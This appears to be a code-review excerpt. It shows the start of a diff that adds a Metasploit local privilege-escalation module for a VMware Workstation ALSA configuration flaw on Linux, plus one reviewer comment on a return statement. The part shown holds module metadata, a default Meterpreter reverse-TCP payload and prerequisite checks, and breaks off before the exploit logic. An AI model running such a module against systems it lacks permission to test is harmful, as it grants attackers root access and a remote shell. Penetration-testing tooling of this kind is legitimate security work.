modules/exploits/linux/local/vmware_alsa_config.rb

```diff
@@ -0,0 +1,242 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'VMware Workstation ALSA Config File Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a vulnerability in VMware Workstation Pro and
+        Player on Linux which allows users to escalate their privileges by
+        using an ALSA configuration file to load and execute a shared object
+        as root when launching a virtual machine with an attached sound card.
+
+        This module has been tested successfully on VMware Player version
+        12.5.0 on Debian Linux.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2017-4915' ],
+          [ 'EDB', '42045' ],
+          [ 'BID', '98566' ],
+          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
+          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
+        ],
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Jann Horn', # Discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'DisclosureDate' => 'May 22 2017',
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'Payload'     => 'linux/x64/meterpreter_reverse_tcp',
+          'PrependFork' => true
+        },
+      'DefaultTarget'  => 1,
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Privileged'     => true ))
+    register_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def has_prereqs?
+    def check_vmplayer?
+      vmplayer = cmd_exec 'which vmplayer'
+      Rex.sleep 0.5
+      if vmplayer.include? 'vmplayer'
+        vprint_good 'vmplayer is installed'
+        return true
+      else
+        print_error 'vmplayer is not installed. Exploitation will fail.'
+        return false
+      end
+    end
+    def check_gcc?
+      gcc = cmd_exec 'which gcc'
+      Rex.sleep 0.5
+      if gcc.include? 'gcc'
+        vprint_good 'gcc is installed'
+        return true
+      else
+        print_error 'gcc is not installed. Compiling will fail.'
+        return false
+      end
+    end
+    return check_vmplayer? && check_gcc?
+  end
+
+  def check
+    unless has_prereqs?
+      print_error 'Target missing prerequisites'
+      return CheckCode::Safe
```

Comment:
this use of return is good because you obviously don't want the code to continue executing after this point